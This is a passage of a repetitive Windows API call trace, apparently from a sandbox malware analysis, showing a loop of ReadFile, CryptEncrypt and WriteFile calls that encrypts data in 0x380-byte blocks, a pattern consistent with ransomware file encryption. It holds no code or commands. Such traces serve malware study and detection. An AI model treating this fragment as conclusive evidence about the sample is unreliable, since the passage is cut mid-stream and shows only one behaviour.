[0275.661] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.661] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.661] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.662] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.662] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.662] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.662] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.662] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.664] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.664] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.665] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.665] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.665] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.665] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.665] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.665] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.666] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.666] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.666] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.666] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.666] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.671] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.671] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.671] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.671] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.671] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.672] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.672] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.672] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.682] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.682] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.682] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.682] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.683] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.683] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.683] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.683] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.683] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.683] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.684] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.684] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.684] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.684] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.684] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.685] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 